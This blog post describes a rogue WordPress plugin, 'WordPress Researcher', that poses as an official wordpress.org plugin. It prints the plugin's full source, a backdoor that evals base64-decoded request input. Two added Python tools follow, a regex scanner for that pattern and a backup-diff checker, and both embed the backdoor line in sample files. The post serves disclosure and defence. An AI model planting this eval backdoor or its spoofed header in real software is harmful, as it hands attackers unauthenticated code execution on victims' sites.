The WordPress Researcher Backdoor Plugin: research__plugin.php

WordPress is the most popular CMS in the world, so it naturally receives special attention from attackers. Recently, several WordPress sites that I manage suddenly gained a plugin called WordPress Researcher. At first glance the name looks harmless, and the header copies wordpress.org's own metadata (author wordpressdotorg, a Plugin URI pointing at the plugin directory, the standard GPL notice) to look official, but once you inspect the source code it is clearly a backdoor. The plugin body is only a few lines: on every request it checks for a CSSl parameter and, if present, base64-decodes it and passes the result to eval(), so anyone who can reach the site can run arbitrary PHP without logging in. I deleted it immediately. The plugin source file is shown below.

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
 
Copyright 2013 wordpressdotorg
 
 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 
 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 
 You should have received a copy of the GNU General Public License
 along with this program; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
 
// Runs on every front-end and admin request once the theme is set up,
// so the trigger below needs no login and no capability check.
function research_plugin(){
  // $_REQUEST merges GET, POST and (depending on request_order) cookie data.
  if (isset($_REQUEST['CSSl'])){
    // Arbitrary attacker-supplied PHP, base64-encoded so the payload stays
    // URL-safe and reads as noise in access logs.
    eval(base64_decode($_REQUEST['CSSl']));
  }
  return;
}

add_action('after_setup_theme', 'research_plugin');
?>
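The only thing that makes this plugin special is the one-line pattern eval(base64_decode($_REQUEST[...])), and that pattern is easy to hunt for across an install. The scanner below is an added example written for this post, not code from the plugin or from WordPress: it walks a document root, flags any eval() whose argument chain contains base64_decode() of request input (also catching common wrappers such as gzinflate()), and separately flags the spoofed "Author: wordpressdotorg" header. The directory name wordpress-researcher, the benign second plugin and the files written by demo() are constructed for the demonstration.

```python
"""Scan a WordPress tree for the eval(base64_decode($_REQUEST[...])) backdoor pattern.

Added example for this post; the paths and sample files in demo() are constructed.
"""
from __future__ import annotations

import os
import re
from pathlib import Path
from tempfile import TemporaryDirectory

# eval() whose argument chain contains base64_decode() applied to request input.
# PHP function names are case-insensitive, and extra decoders such as
# gzinflate() are often wrapped around the base64_decode() call.
BACKDOOR_RE = re.compile(
    r"eval\s*\(.*base64_decode\s*\(.*\$_(?:REQUEST|GET|POST|COOKIE)\b",
    re.IGNORECASE,
)

# A header claiming the generic wordpress.org identity is camouflage, not an
# author: genuine plugins name their actual maintainer.
SPOOFED_AUTHOR_RE = re.compile(r"^[ \t]*Author:[ \t]*wordpressdotorg[ \t]*$",
                               re.IGNORECASE | re.MULTILINE)

PHP_SUFFIXES = (".php", ".phtml", ".inc", ".php5")


def find_backdoor_lines(text: str) -> list[tuple[int, str]]:
    """Return (line number, stripped line) for every line matching BACKDOOR_RE."""
    return [(n, line.strip())
            for n, line in enumerate(text.splitlines(), 1)
            if BACKDOOR_RE.search(line)]


def scan_file(path: Path) -> list[dict]:
    findings: list[dict] = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    for lineno, line in find_backdoor_lines(text):
        findings.append({"file": str(path), "line": lineno,
                         "kind": "eval-base64-request", "text": line})
    m = SPOOFED_AUTHOR_RE.search(text)
    if m:
        findings.append({"file": str(path), "line": text.count("\n", 0, m.start()) + 1,
                         "kind": "spoofed-author-header", "text": m.group(0).strip()})
    return findings


def scan_tree(root) -> list[dict]:
    """Walk root (a WordPress document root) and scan every PHP source file."""
    findings: list[dict] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(PHP_SUFFIXES):
                findings.extend(scan_file(Path(dirpath) / name))
    return findings


# Constructed sample files: the first mirrors the plugin quoted above, the
# second uses base64_decode() legitimately on stored data rather than on input.
SAMPLE_BACKDOOR = """<?php
/*
Plugin Name: WordPress Researcher
Author: wordpressdotorg
*/
function research_plugin(){
  if (isset($_REQUEST['CSSl'])){
    eval(base64_decode($_REQUEST['CSSl']));
  }
  return;
}
add_action('after_setup_theme', 'research_plugin');
"""
SAMPLE_BENIGN = """<?php
$icon = base64_decode(get_option('my_plugin_icon'));
"""


def demo() -> list[tuple[str, str, int]]:
    """Scan a constructed two-plugin tree and return (file, kind, line) triples."""
    with TemporaryDirectory() as tmp:
        plugins = Path(tmp) / "wp-content" / "plugins"
        (plugins / "wordpress-researcher").mkdir(parents=True)
        (plugins / "wordpress-researcher" / "research__plugin.php").write_text(SAMPLE_BACKDOOR)
        (plugins / "benign-plugin").mkdir()
        (plugins / "benign-plugin" / "benign-plugin.php").write_text(SAMPLE_BENIGN)
        findings = scan_tree(tmp)
    return sorted((Path(f["file"]).name, f["kind"], f["line"]) for f in findings)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Run it against the real document root with scan_tree("/var/www/html") (path assumed) and triage every hit by hand; legitimate plugins almost never eval() decoded request data, so the false-positive rate is low, but obfuscated variants that build the function name at runtime will slip past a regex and still need a file-diff against a clean copy.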

The Extend Calendar plugin was installed alongside WordPress Researcher, and its code was no better. I deleted that one too, then upgraded WordPress, changed the admin password, and, for extra safety, downloaded the entire site and compared it against an earlier backup to see whether the plugin had modified any other files.
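Comparing the downloaded site against an earlier backup, as described above, comes down to hashing both trees and classifying every path as added, removed or modified. The following is an added example for this post, not the author's own tooling: it excludes uploads and cache directories by default because they change legitimately (review those by hand), and demo() builds a constructed pair of trees in which the live copy gained the rogue plugin and an edited wp-config.php. The plugin directory name wordpress-researcher and every file in demo() are assumptions made for the demonstration. Keep in mind that a file diff cannot show what an attacker with eval() did in the database, such as adding an administrator account, so check that separately.

```python
"""Compare a live WordPress tree against a known-good backup by SHA-256.

Added example for this post; the trees built in demo() are constructed.
"""
from __future__ import annotations

import hashlib
import os
from pathlib import Path
from tempfile import TemporaryDirectory

# Paths that legitimately differ between a backup and the live site and would
# otherwise drown the report; review them separately rather than trusting them.
DEFAULT_IGNORE = ("wp-content/uploads/", "wp-content/cache/")


def hash_tree(root) -> dict[str, str]:
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    root = Path(root)
    digests: dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            h = hashlib.sha256()
            with path.open("rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff_trees(live, backup, ignore=DEFAULT_IGNORE) -> dict[str, list[str]]:
    """Classify every file as added, removed or modified relative to the backup.

    A file only in the live tree is the planted-plugin case; a modified core
    file or wp-config.php means the attacker went beyond the plugin directory.
    """
    live_h = {p: d for p, d in hash_tree(live).items() if not p.startswith(ignore)}
    backup_h = {p: d for p, d in hash_tree(backup).items() if not p.startswith(ignore)}
    common = live_h.keys() & backup_h.keys()
    return {
        "added": sorted(live_h.keys() - backup_h.keys()),
        "removed": sorted(backup_h.keys() - live_h.keys()),
        "modified": sorted(p for p in common if live_h[p] != backup_h[p]),
    }


def _write(root: Path, rel: str, content: str) -> None:
    path = root / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(content)


def demo() -> dict[str, list[str]]:
    """Constructed live tree and backup: the live copy gained the rogue plugin,
    had wp-config.php edited and received a normal upload; the backup still
    holds a file that was deleted since."""
    with TemporaryDirectory() as live_dir, TemporaryDirectory() as backup_dir:
        live, backup = Path(live_dir), Path(backup_dir)
        for root in (live, backup):
            _write(root, "wp-config.php", "<?php define('DB_NAME', 'wp');\n")
            _write(root, "wp-includes/version.php", "<?php // unchanged core file\n")
        _write(live, "wp-content/plugins/wordpress-researcher/research__plugin.php",
               "<?php eval(base64_decode($_REQUEST['CSSl']));\n")
        _write(live, "wp-config.php",
               "<?php define('DB_NAME', 'wp');\n// constructed modification\n")
        _write(live, "wp-content/uploads/2013/photo.jpg", "constructed upload\n")
        _write(backup, "wp-content/old-readme.txt", "since deleted\n")
        return diff_trees(live, backup)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In practice, call diff_trees("/path/to/downloaded-site", "/path/to/backup") (paths assumed) and treat every "added" PHP file and every "modified" entry outside wp-content/uploads as suspect until you have read it; if the backup predates a WordPress upgrade, diff against a fresh download of the same core version instead of the backup to separate upgrade noise from tampering.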
